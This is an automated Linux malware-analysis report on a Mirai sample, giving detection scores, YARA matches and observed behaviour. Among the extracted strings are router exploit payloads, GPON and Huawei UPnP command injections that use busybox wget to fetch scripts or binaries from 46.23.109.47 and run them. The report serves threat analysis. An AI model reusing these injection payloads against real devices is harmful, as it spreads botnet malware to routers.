Linux Analysis Report
RaNg2d7Qzo

Overview

General Information

Sample Name: RaNg2d7Qzo
Analysis ID: 679631
MD5: 8c33b327bc030efedb88abee85efef14
SHA1: af6b7dabe6acf0577663902ef127acadf7fa6168
SHA256: 1f732b672c0f0f1893f9515fa07dc655618beaeb8dd47f0ebeb00895f862ba4f
Tags: 32elfmipsmirai
Infos:

Detection

Mirai
Score: 64
Range: 0 - 100
Whitelisted: false

Signatures

Antivirus / Scanner detection for submitted sample
Yara detected Mirai
Multi AV Scanner detection for submitted file
Yara signature match
Sample has stripped symbol table
Uses the "uname" system call to query kernel version information (possible evasion)
Enumerates processes within the "proc" file system
Sample listens on a socket
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable

Classification

AV Detection

barindex
Source: RaNg2d7Qzo Avira: detected
Source: RaNg2d7Qzo Virustotal: Detection: 59% Perma Link
Source: RaNg2d7Qzo Metadefender: Detection: 34% Perma Link
Source: RaNg2d7Qzo ReversingLabs: Detection: 69%
Source: /tmp/RaNg2d7Qzo (PID: 6232) Socket: 127.0.0.1::44455 Jump to behavior
Source: RaNg2d7Qzo String found in binary or memory: http://0.0.0.0/Cloud/Cloud.x86
Source: RaNg2d7Qzo String found in binary or memory: http://46.23.109.47/Cloud/Cloud.mips;
Source: RaNg2d7Qzo String found in binary or memory: http://46.23.109.47/Cloud/Cloud.mpsl;chmod
Source: RaNg2d7Qzo String found in binary or memory: http://46.23.109.47/Cloud/Cloud.x86
Source: RaNg2d7Qzo String found in binary or memory: http://46.23.109.47/Cloud/Comtrend.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%27/&sessionKey=1039230114
Source: RaNg2d7Qzo String found in binary or memory: http://46.23.109.47/Cloud/Dlink.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$
Source: RaNg2d7Qzo String found in binary or memory: http://46.23.109.47/Cloud/Gpon.sh
Source: RaNg2d7Qzo String found in binary or memory: http://46.23.109.47/Cloud/Netlink.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%27/&waninf=1_INTERNET_R_VI
Source: RaNg2d7Qzo String found in binary or memory: http://purenetworks.com/HNAP1/
Source: RaNg2d7Qzo String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: RaNg2d7Qzo String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: RaNg2d7Qzo, type: SAMPLE Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., score = , reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), modified = 2022-05-13
Source: 6232.1.00007fd13c465000.00007fd13c467000.rw-.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., score = , reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), modified = 2022-05-13
Source: 6232.1.00007fd13c400000.00007fd13c424000.r-x.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., score = , reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), modified = 2022-05-13
Source: 6235.1.00007fd13c400000.00007fd13c424000.r-x.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., score = , reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), modified = 2022-05-13
Source: 6235.1.00007fd13c465000.00007fd13c467000.rw-.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., score = , reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), modified = 2022-05-13
Source: ELF static info symbol of initial sample .symtab present: no
Source: Initial sample String containing 'busybox' found: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://46.23.109.47/Cloud/Gpon.sh+-O+vaicalon;chmod+777+*;sh+vaicalon`&ipv=0
Source: Initial sample String containing 'busybox' found: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://46.23.109.47/Cloud/Gpon.sh+-O+anngu;chmod+777+*;sh+anngu`&ipv=0
Source: Initial sample String containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://46.23.109.47/Cloud/Cloud.mips; chmod 777 Cloud.mips; ./Cloud.mips Cloud.Huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: Initial sample String containing 'busybox' found: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://46.23.109.47/Cloud/Gpon.sh+-O+anngu;chmod+777+*;sh+anngu`&ipv=0POST /HNAP1/ HTTP/1.0
Source: classification engine Classification label: mal64.troj.lin@0/0@0/0
Source: /tmp/RaNg2d7Qzo (PID: 6234) File opened: /proc/6236/exe Jump to behavior
Source: /tmp/RaNg2d7Qzo (PID: 6234) File opened: /proc/1582/exe Jump to behavior
Source: /tmp/RaNg2d7Qzo (PID: 6234) File opened: /proc/2033/exe Jump to behavior
Source: /tmp/RaNg2d7Qzo (PID: 6234) File opened: /proc/2275/exe Jump to behavior
Source: /tmp/RaNg2d7Qzo (PID: 6234) File opened: /proc/3088/exe Jump to behavior
Source: /tmp/RaNg2d7Qzo (PID: 6234) File opened: /proc/6191/exe Jump to behavior
Source: /tmp/RaNg2d7Qzo (PID: 6234) File opened: /proc/6192/exe Jump to behavior
Source: /tmp/RaNg2d7Qzo (PID: 6234) File opened: /proc/1612/exe Jump to behavior
Source: /tmp/RaNg2d7Qzo (PID: 6234) File opened: /proc/1579/exe Jump to behavior
Source: /tmp/RaNg2d7Qzo (PID: 6234) File opened: /proc/1699/exe Jump to behavior
Source: /tmp/RaNg2d7Qzo (PID: 6234) File opened: /proc/1335/exe Jump to behavior
Source: /tmp/RaNg2d7Qzo (PID: 6234) File opened: /proc/1698/exe Jump to behavior
Source: /tmp/RaNg2d7Qzo (PID: 6234) File opened: /proc/2028/exe Jump to behavior
Source: /tmp/RaNg2d7Qzo (PID: 6234) File opened: /proc/1334/exe Jump to behavior
Source: /tmp/RaNg2d7Qzo (PID: 6234) File opened: /proc/1576/exe Jump to behavior
Source: /tmp/RaNg2d7Qzo (PID: 6234) File opened: /proc/2302/exe Jump to behavior
Source: /tmp/RaNg2d7Qzo (PID: 6234) File opened: /proc/3236/exe Jump to behavior
Source: /tmp/RaNg2d7Qzo (PID: 6234) File opened: /proc/2025/exe Jump to behavior
Source: /tmp/RaNg2d7Qzo (PID: 6234) File opened: /proc/2146/exe Jump to behavior
Source: /tmp/RaNg2d7Qzo (PID: 6234) File opened: /proc/910/exe Jump to behavior
Source: /tmp/RaNg2d7Qzo (PID: 6234) File opened: /proc/6347/exe Jump to behavior
Source: /tmp/RaNg2d7Qzo (PID: 6234) File opened: /proc/912/exe Jump to behavior
Source: /tmp/RaNg2d7Qzo (PID: 6234) File opened: /proc/517/exe Jump to behavior
Source: /tmp/RaNg2d7Qzo (PID: 6234) File opened: /proc/759/exe Jump to behavior
Source: /tmp/RaNg2d7Qzo (PID: 6234) File opened: /proc/2307/exe Jump to behavior
Source: /tmp/RaNg2d7Qzo (PID: 6234) File opened: /proc/918/exe Jump to behavior
Source: /tmp/RaNg2d7Qzo (PID: 6234) File opened: /proc/6241/exe Jump to behavior
Source: /tmp/RaNg2d7Qzo (PID: 6234) File opened: /proc/6240/exe Jump to behavior
Source: /tmp/RaNg2d7Qzo (PID: 6234) File opened: /proc/6243/exe Jump to behavior
Source: /tmp/RaNg2d7Qzo (PID: 6234) File opened: /proc/4465/exe Jump to behavior
Source: /tmp/RaNg2d7Qzo (PID: 6234) File opened: /proc/6246/exe Jump to behavior
Source: /tmp/RaNg2d7Qzo (PID: 6234) File opened: /proc/1594/exe Jump to behavior
Source: /tmp/RaNg2d7Qzo (PID: 6234) File opened: /proc/2285/exe Jump to behavior
Source: /tmp/RaNg2d7Qzo (PID: 6234) File opened: /proc/2281/exe Jump to behavior
Source: /tmp/RaNg2d7Qzo (PID: 6234) File opened: /proc/1349/exe Jump to behavior
Source: /tmp/RaNg2d7Qzo (PID: 6234) File opened: /proc/1623/exe Jump to behavior
Source: /tmp/RaNg2d7Qzo (PID: 6234) File opened: /proc/761/exe Jump to behavior
Source: /tmp/RaNg2d7Qzo (PID: 6234) File opened: /proc/1622/exe Jump to behavior
Source: /tmp/RaNg2d7Qzo (PID: 6234) File opened: /proc/884/exe Jump to behavior
Source: /tmp/RaNg2d7Qzo (PID: 6234) File opened: /proc/1983/exe Jump to behavior
Source: /tmp/RaNg2d7Qzo (PID: 6234) File opened: /proc/2038/exe Jump to behavior
Source: /tmp/RaNg2d7Qzo (PID: 6234) File opened: /proc/1344/exe Jump to behavior
Source: /tmp/RaNg2d7Qzo (PID: 6234) File opened: /proc/1465/exe Jump to behavior
Source: /tmp/RaNg2d7Qzo (PID: 6234) File opened: /proc/1586/exe Jump to behavior
Source: /tmp/RaNg2d7Qzo (PID: 6234) File opened: /proc/1463/exe Jump to behavior
Source: /tmp/RaNg2d7Qzo (PID: 6234) File opened: /proc/2156/exe Jump to behavior
Source: /tmp/RaNg2d7Qzo (PID: 6234) File opened: /proc/800/exe Jump to behavior
Source: /tmp/RaNg2d7Qzo (PID: 6234) File opened: /proc/801/exe Jump to behavior
Source: /tmp/RaNg2d7Qzo (PID: 6234) File opened: /proc/1629/exe Jump to behavior
Source: /tmp/RaNg2d7Qzo (PID: 6234) File opened: /proc/1627/exe Jump to behavior
Source: /tmp/RaNg2d7Qzo (PID: 6234) File opened: /proc/1900/exe Jump to behavior
Source: /tmp/RaNg2d7Qzo (PID: 6234) File opened: /proc/6252/exe Jump to behavior
Source: /tmp/RaNg2d7Qzo (PID: 6234) File opened: /proc/6254/exe Jump to behavior
Source: /tmp/RaNg2d7Qzo (PID: 6234) File opened: /proc/6256/exe Jump to behavior
Source: /tmp/RaNg2d7Qzo (PID: 6234) File opened: /proc/6255/exe Jump to behavior
Source: /tmp/RaNg2d7Qzo (PID: 6234) File opened: /proc/6258/exe Jump to behavior
Source: /tmp/RaNg2d7Qzo (PID: 6234) File opened: /proc/6257/exe Jump to behavior
Source: /tmp/RaNg2d7Qzo (PID: 6234) File opened: /proc/3021/exe Jump to behavior
Source: /tmp/RaNg2d7Qzo (PID: 6234) File opened: /proc/491/exe Jump to behavior
Source: /tmp/RaNg2d7Qzo (PID: 6234) File opened: /proc/2294/exe Jump to behavior
Source: /tmp/RaNg2d7Qzo (PID: 6234) File opened: /proc/2050/exe Jump to behavior
Source: /tmp/RaNg2d7Qzo (PID: 6234) File opened: /proc/6250/exe Jump to behavior
Source: /tmp/RaNg2d7Qzo (PID: 6234) File opened: /proc/1877/exe Jump to behavior
Source: /tmp/RaNg2d7Qzo (PID: 6234) File opened: /proc/772/exe Jump to behavior
Source: /tmp/RaNg2d7Qzo (PID: 6234) File opened: /proc/1633/exe Jump to behavior
Source: /tmp/RaNg2d7Qzo (PID: 6234) File opened: /proc/1599/exe Jump to behavior
Source: /tmp/RaNg2d7Qzo (PID: 6234) File opened: /proc/1632/exe Jump to behavior
Source: /tmp/RaNg2d7Qzo (PID: 6234) File opened: /proc/774/exe Jump to behavior
Source: /tmp/RaNg2d7Qzo (PID: 6234) File opened: /proc/1477/exe Jump to behavior
Source: /tmp/RaNg2d7Qzo (PID: 6234) File opened: /proc/654/exe Jump to behavior
Source: /tmp/RaNg2d7Qzo (PID: 6234) File opened: /proc/896/exe Jump to behavior
Source: /tmp/RaNg2d7Qzo (PID: 6234) File opened: /proc/1476/exe Jump to behavior
Source: /tmp/RaNg2d7Qzo (PID: 6234) File opened: /proc/1872/exe Jump to behavior
Source: /tmp/RaNg2d7Qzo (PID: 6234) File opened: /proc/2048/exe Jump to behavior
Source: /tmp/RaNg2d7Qzo (PID: 6234) File opened: /proc/655/exe Jump to behavior
Source: /tmp/RaNg2d7Qzo (PID: 6234) File opened: /proc/1475/exe Jump to behavior
Source: /tmp/RaNg2d7Qzo (PID: 6234) File opened: /proc/2289/exe Jump to behavior
Source: /tmp/RaNg2d7Qzo (PID: 6234) File opened: /proc/656/exe Jump to behavior
Source: /tmp/RaNg2d7Qzo (PID: 6234) File opened: /proc/777/exe Jump to behavior
Source: /tmp/RaNg2d7Qzo (PID: 6234) File opened: /proc/657/exe Jump to behavior
Source: /tmp/RaNg2d7Qzo (PID: 6234) File opened: /proc/4466/exe Jump to behavior
Source: /tmp/RaNg2d7Qzo (PID: 6234) File opened: /proc/658/exe Jump to behavior
Source: /tmp/RaNg2d7Qzo (PID: 6234) File opened: /proc/4467/exe Jump to behavior
Source: /tmp/RaNg2d7Qzo (PID: 6234) File opened: /proc/6248/exe Jump to behavior
Source: /tmp/RaNg2d7Qzo (PID: 6234) File opened: /proc/4468/exe Jump to behavior
Source: /tmp/RaNg2d7Qzo (PID: 6234) File opened: /proc/419/exe Jump to behavior
Source: /tmp/RaNg2d7Qzo (PID: 6234) File opened: /proc/936/exe Jump to behavior
Source: /tmp/RaNg2d7Qzo (PID: 6234) File opened: /proc/1639/exe Jump to behavior
Source: /tmp/RaNg2d7Qzo (PID: 6234) File opened: /proc/1638/exe Jump to behavior
Source: /tmp/RaNg2d7Qzo (PID: 6234) File opened: /proc/2208/exe Jump to behavior
Source: /tmp/RaNg2d7Qzo (PID: 6234) File opened: /proc/2180/exe Jump to behavior
Source: /tmp/RaNg2d7Qzo (PID: 6234) File opened: /proc/6264/exe Jump to behavior
Source: /tmp/RaNg2d7Qzo (PID: 6234) File opened: /proc/6267/exe Jump to behavior
Source: /tmp/RaNg2d7Qzo (PID: 6234) File opened: /proc/1809/exe Jump to behavior
Source: /tmp/RaNg2d7Qzo (PID: 6234) File opened: /proc/1494/exe Jump to behavior
Source: /tmp/RaNg2d7Qzo (PID: 6234) File opened: /proc/1890/exe Jump to behavior
Source: /tmp/RaNg2d7Qzo (PID: 6234) File opened: /proc/2063/exe Jump to behavior
Source: /tmp/RaNg2d7Qzo (PID: 6234) File opened: /proc/2062/exe Jump to behavior
Source: /tmp/RaNg2d7Qzo (PID: 6234) File opened: /proc/1888/exe Jump to behavior
Source: /tmp/RaNg2d7Qzo (PID: 6234) File opened: /proc/1886/exe Jump to behavior
Source: /tmp/RaNg2d7Qzo (PID: 6234) File opened: /proc/420/exe Jump to behavior
Source: /tmp/RaNg2d7Qzo (PID: 6234) File opened: /proc/1489/exe Jump to behavior
Source: /tmp/RaNg2d7Qzo (PID: 6234) File opened: /proc/785/exe Jump to behavior
Source: /tmp/RaNg2d7Qzo (PID: 6234) File opened: /proc/1642/exe Jump to behavior
Source: /tmp/RaNg2d7Qzo (PID: 6234) File opened: /proc/788/exe Jump to behavior
Source: /tmp/RaNg2d7Qzo (PID: 6232) Queries kernel information via 'uname': Jump to behavior
Source: RaNg2d7Qzo, 6232.1.0000556cacb4d000.0000556cacbd4000.rw-.sdmp, RaNg2d7Qzo, 6235.1.0000556cacb4d000.0000556cacbd4000.rw-.sdmp Binary or memory string: /etc/qemu-binfmt/mipsel
Source: RaNg2d7Qzo, 6232.1.0000556cacb4d000.0000556cacbd4000.rw-.sdmp, RaNg2d7Qzo, 6235.1.0000556cacb4d000.0000556cacbd4000.rw-.sdmp Binary or memory string: lU!/etc/qemu-binfmt/mipsel
Source: RaNg2d7Qzo, 6232.1.00007ffc863d1000.00007ffc863f2000.rw-.sdmp, RaNg2d7Qzo, 6235.1.00007ffc863d1000.00007ffc863f2000.rw-.sdmp Binary or memory string: x86_64/usr/bin/qemu-mipsel/tmp/RaNg2d7QzoSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/RaNg2d7Qzo
Source: RaNg2d7Qzo, 6232.1.00007ffc863d1000.00007ffc863f2000.rw-.sdmp, RaNg2d7Qzo, 6235.1.00007ffc863d1000.00007ffc863f2000.rw-.sdmp Binary or memory string: /usr/bin/qemu-mipsel

Stealing of Sensitive Information

barindex
Source: Yara match File source: RaNg2d7Qzo, type: SAMPLE
Source: Yara match File source: 6232.1.00007fd13c400000.00007fd13c424000.r-x.sdmp, type: MEMORY
Source: Yara match File source: 6235.1.00007fd13c400000.00007fd13c424000.r-x.sdmp, type: MEMORY

Remote Access Functionality

barindex
Source: Yara match File source: RaNg2d7Qzo, type: SAMPLE
Source: Yara match File source: 6232.1.00007fd13c400000.00007fd13c424000.r-x.sdmp, type: MEMORY
Source: Yara match File source: 6235.1.00007fd13c400000.00007fd13c424000.r-x.sdmp, type: MEMORY
No contacted IP infos